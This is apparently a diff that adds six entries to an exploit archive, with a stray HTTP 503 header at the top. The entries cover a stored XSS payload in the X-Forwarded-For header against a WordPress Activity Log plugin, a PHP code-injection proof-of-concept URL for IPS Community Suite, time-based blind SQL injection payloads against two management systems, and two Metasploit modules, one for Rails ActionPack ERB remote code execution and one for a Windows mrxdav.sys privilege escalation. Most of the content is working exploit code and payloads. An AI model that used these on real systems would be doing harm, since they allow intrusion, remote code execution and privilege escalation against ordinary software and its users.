+HTTP/1.1 503 Service Unavailable
+Date: Tue, 05 Jul 2016 19:31:19 GMT
+Server: Apache/2.4.18 (Ubuntu)
+Content-Length: 0
+Connection: close
+Content-Type: text/html; charset=UTF-8
diff --git a/platforms/php/webapps/40083.txt b/platforms/php/webapps/40083.txt
new file mode 100755
index 000000000..b5b791f79
--- /dev/null
+++ b/platforms/php/webapps/40083.txt
@@ -0,0 +1,48 @@
+Persistent Cross-Site Scripting in WordPress Activity Log plugin
+Han Sahin
+
+Abstract
+
+A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
+
+Tested versions
+
+This issue was successfully tested on WordPress Activity Log plugin version 2.3.1.
+
+Fix
+
+This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip.
+
+Introduction
+
+The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin).
+
+Details
+
+The WordPress Activity Log plugin fails to sufficiently check input supplied to the X-Forwarded-For HTTP header and perform output encoding when the input is presented in a "wrong password event". As a result the malicious request will be stored in the Activity Log page, executing the payload when an unsuspecting user views this specific page.
+
+An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
+
+Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims).
+
+
+Proof of concept
+
+This vulnerability can be demonstrated by submitting an XFF header similar to the following:
+
+POST /wp-login.php HTTP/1.1
+Host: 192.168.28.135
+Content-Length: 113
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: http://
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8,nl;q=0.6
+X-Forwarded-For: <script>alert(document.cookie);</script>
+Connection: close
+
+log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1
\ No newline at end of file
diff --git a/platforms/php/webapps/40084.txt b/platforms/php/webapps/40084.txt
new file mode 100755
index 000000000..27458ae25
--- /dev/null
+++ b/platforms/php/webapps/40084.txt
@@ -0,0 +1,72 @@
+---------------------------------------------------------------------------
+IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability
+---------------------------------------------------------------------------
+
+
+[-] Software Link:
+
+https://invisionpower.com/
+
+
+[-] Affected Versions:
+
+Version 4.1.12.3 and prior versions.
+
+
+[-] Vulnerability Description:
+
+The vulnerable code is located in the /applications/core/modules/front/system/content.php script:
+
+38.	$class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) );
+39.	
+40.	if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) )
+41.	{
+42.	    \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' );
+43.	}
+
+User input passed through the "content_class" request parameter is not properly sanitized before being used in a call
+to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute
+arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script:
+
+171.	if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) )
+172.	{
+173.	    $databaseId = mb_substr( $class, 14 );
+174.	    eval( "namespace IPS\\cms; class Fields{$databaseId} extends Fields { public static \$customDatabaseId [...]
+175.	}
+
+Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8.
+
+
+[-] Proof of Concept:
+
+http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/*
+
+
+[-] Solution:
+
+Update to version 4.1.13 or later.
+
+
+[-] Disclosure Timeline:
+
+[04/07/2016] - Vendor notified
+[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/
+[06/07/2016] - CVE number requested
+[06/07/2016] - CVE number assigned
+[07/07/2016] - Public disclosure
+
+
+[-] CVE Reference:
+
+The Common Vulnerabilities and Exposures project (cve.mitre.org)
+has assigned the name CVE-2016-6174 to this vulnerability.
+
+
+[-] Credits:
+
+Vulnerability discovered by Egidio Romano.
+
+
+[-] Original Advisory:
+
+http://karmainsecurity.com/KIS-2016-11
\ No newline at end of file
diff --git a/platforms/php/webapps/40092.txt b/platforms/php/webapps/40092.txt
new file mode 100755
index 000000000..ab9132e0a
--- /dev/null
+++ b/platforms/php/webapps/40092.txt
@@ -0,0 +1,31 @@
+####
+# Vulnerability Title 	: Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability 
+# Date 			: 11/07/2016
+# Exploit Author 	: Yakir Wizman
+# Vendor Homepage 	: http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system
+# Version		: All Versions
+# Tested on		: Apache | PHP 5.5.36 | MySQL 5.6.30
+####
+# Software Link	 	: N/A
+# Google Dork 		: N/A
+# CVE 			: N/A
+####
+
+# Vendor Software Description:
+# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon.
+# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide.
+# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system.
+####
+
+# No authentication (login) is required to exploit this vulnerability.
+# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# URL example	: http://server/booking.php
+#
+# Page		: booking.php
+# Parameter	: age (POST)
+#    Type	: AND/OR time-based blind
+#    Title	: MySQL >= 5.0.12 AND time-based blind
+#    Payload	: name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
+# 
+####
diff --git a/platforms/php/webapps/40093.txt b/platforms/php/webapps/40093.txt
new file mode 100755
index 000000000..3a3a5d062
--- /dev/null
+++ b/platforms/php/webapps/40093.txt
@@ -0,0 +1,27 @@
+####
+# Vulnerability Title 	: Clinic Management System Unauthenticated Blind SQL Injection (apointment.php age) Vulnerability 
+# Date 			: 11/07/2016
+# Exploit Author 	: Yakir Wizman
+# Vendor Homepage 	: http://rexbd.net/software/clinic-management-system
+# Version		: All Versions
+# Tested on		: Apache | PHP 5.5.36 | MySQL 5.6.30
+####
+
+####
+# Vendor Software Description:
+# Clinico – Clinic Management System is powerful, flexible, and easy to use responsive platform.
+# The system has control for all system modules thats enables you to develop your organization billing system and improve its effectiveness and quality.
+####
+
+# No authentication (login) is required to exploit this vulnerability.
+# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# URL example	: http://server/apointment.php
+#
+# Page		: apointment.php
+# Parameter	: age (POST)
+#    Type	: AND/OR time-based blind
+#    Title	: MySQL >= 5.0.12 AND time-based blind
+#    Payload	: ame=Test&age=24’ AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
+# 
+####
diff --git a/platforms/ruby/remote/40086.rb b/platforms/ruby/remote/40086.rb
new file mode 100755
index 000000000..5bc9da26e
--- /dev/null
+++ b/platforms/ruby/remote/40086.rb
@@ -0,0 +1,70 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails ActionPack Inline ERB Code Execution',
+      'Description'    => %q{
+          This module exploits a remote code execution vulnerability in the
+        inline request processor of the Ruby on Rails ActionPack component.
+        This vulnerability allows an attacker to process ERB to the inline
+        JSON processor, which is then rendered, permitting full RCE within
+        the runtime, without logging an error condition.
+      },
+      'Author'         =>
+        [
+          'RageLtMan <rageltman[at]sempervictus>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2016-2098' ]
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        =>	[ ['Automatic', {} ] ],
+      'DisclosureDate' => 'Mar 1 2016',
+      'DefaultOptions' => {
+        "PrependFork" => true
+      },
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
+      ], self.class)
+
+  end
+
+  def json_request
+    code = Rex::Text.encode_base64(payload.encoded)
+    return {
+      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
+    }.to_json
+  end
+
+  def exploit
+    print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
+    send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'GET',
+      'ctype'   => 'application/json',
+      'headers' => {
+        'Accept' => 'application/json'
+      },
+      'data'    => json_request
+    }, 25)
+  end
+end
\ No newline at end of file
diff --git a/platforms/windows/local/40085.rb b/platforms/windows/local/40085.rb
new file mode 100755
index 000000000..8c7fa0ed7
--- /dev/null
+++ b/platforms/windows/local/40085.rb
@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits the vulnerability in mrxdav.sys described by MS16-016.  The module will spawn
+        a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
+        the specified payload within the context of the elevated process.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Tamas Koczka',                               # Original Exploit
+          'William Webb <william_webb[at]rapid7.com>'   # C port and Metasploit module
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => 'false'
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP1', { } ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2016-0051' ],
+          [ 'MSB', 'MS16-016'  ]
+        ],
+      'DisclosureDate' => 'Feb 09 2016',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Detected
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    print_status("Launching notepad to host the exploit...")
+    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
+    begin
+      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      print_status("Operation failed. Hosting exploit in the current process...")
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
+    library_path = ::File.expand_path(library_path)
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    print_status("Exploit injected ... injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+    thread = process.thread.create(exploit_mem + offset, payload_mem)
+    sleep(3)
+    print_status("Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
+  end
+ end